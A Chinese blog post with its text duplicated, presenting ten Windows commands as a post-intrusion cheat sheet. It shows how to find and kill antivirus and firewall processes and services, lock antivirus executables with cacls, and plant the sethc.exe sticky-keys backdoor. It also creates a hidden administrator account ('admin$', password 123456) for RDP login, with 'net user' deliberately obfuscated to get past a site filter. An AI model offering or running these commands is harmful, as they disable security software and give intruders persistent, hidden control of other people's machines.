10大网络命令
2009-08-19 13:33
239 查看
1.ver
作用:查看系统版本
实例:ver
2.tasklist
作用:列出机器的所有进程
实例:tasklist
说明:用它你就可以知道机器的杀毒软件、防火墙
3.taskkill
作用:杀制定名字或者pid的进程
实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389
说明:使用它可以结束防火墙进程。
4.net start
作用:列出机器所有服务或者启动某个指定的服务
实例: net start 或者 net start w3svc(启动iis)
说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。
比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。
5.net stop
作用:停止指定的服务
格式:net stop "服务名"
实例: net stop sharedaccess (停止windows防火墙)
说明:结合net start使用
6.cacls
作用:设置文件权限
实例: cacls c:/windows/mm.exe /P everyone:R 或者cacls c:/progra~1/rising/ravmond.exe /d:everyone
设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html
)
7.&
作用:连续执行多个命令
实例:del c:/windows/system32/sethc.exe & del
c:/windows/system32/dllcache/sethc.exe & copy
c:/windows/explorer.exe c:/windows/system32/dllcache/sethc.exe &
copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
8.echo y|Smowu
作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)
实例:echo y>echo y>cacls c:/windows/mm.exe /P everyone:R;
说明:将上面shift按多次后门简化:echo y | copy c:/windows/explorer.exe
c:/windows/system32/dllcache/sethc.exe & echo y | copy
c:/windows/explorer.exe c:/windows/system32/sethc.exe
(直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)
9.net us_er/group(_去掉,因为华夏屏蔽)
作用:开帐号,并加入到组(一般是administrators组)
实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add
说明:以上通过
&操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:http://hi.baidu.com
/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html
10.shutdown
作用:重启或者关闭机器,或者取消关机
实例:shutdown -r -t 0(立即重启)
以上命令有些2000下可能无法运行,xp,2003下肯定ok。
作用:查看系统版本
实例:ver
2.tasklist
作用:列出机器的所有进程
实例:tasklist
说明:用它你就可以知道机器的杀毒软件、防火墙
3.taskkill
作用:杀制定名字或者pid的进程
实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389
说明:使用它可以结束防火墙进程。
4.net start
作用:列出机器所有服务或者启动某个指定的服务
实例: net start 或者 net start w3svc(启动iis)
说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。
比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。
5.net stop
作用:停止指定的服务
格式:net stop "服务名"
实例: net stop sharedaccess (停止windows防火墙)
说明:结合net start使用
6.cacls
作用:设置文件权限
实例: cacls c:/windows/mm.exe /P everyone:R 或者cacls c:/progra~1/rising/ravmond.exe /d:everyone
设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html
)
7.&
作用:连续执行多个命令
实例:del c:/windows/system32/sethc.exe & del
c:/windows/system32/dllcache/sethc.exe & copy
c:/windows/explorer.exe c:/windows/system32/dllcache/sethc.exe &
copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
8.echo y|Smowu
作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)
实例:echo y>echo y>cacls c:/windows/mm.exe /P everyone:R;
说明:将上面shift按多次后门简化:echo y | copy c:/windows/explorer.exe
c:/windows/system32/dllcache/sethc.exe & echo y | copy
c:/windows/explorer.exe c:/windows/system32/sethc.exe
(直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)
9.net us_er/group(_去掉,因为华夏屏蔽)
作用:开帐号,并加入到组(一般是administrators组)
实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add
说明:以上通过
&操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:http://hi.baidu.com
/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html
10.shutdown
作用:重启或者关闭机器,或者取消关机
实例:shutdown -r -t 0(立即重启)
以上命令有些2000下可能无法运行,xp,2003下肯定ok。
相关文章推荐
- Linux的系统调用、网络连接状态、磁盘I/O;可疑行为监控/日志收集、SHELL命令执行流程
- 常用网络命令及命令实例详解1
- linux查看网络状态命令
- 常用网络命令及命令实例详解9
- Linux 命令大全-网络资源
- [转]Linux必学的60个命令(5)-网络安全命令
- windows常用网络命令图文详解
- 网络参数设置命令
- 网络诊断工具之—路由追踪tracert命令
- Linux服务器上监控网络宽带的18个命令
- Linux网络管理常用命令:net-tools VS iproute2
- 常用网络命令
- Linux必学的60个命令:网络操作命令
- 转载和积累系列 - Linux常用网络命令
- dos下网络命令
- 六条经典的网络命令详解
- 网络工具命令
- linux基础(六)----linux命令系统学习----网络操作命令
- 网络常用命令详解(杂七杂八)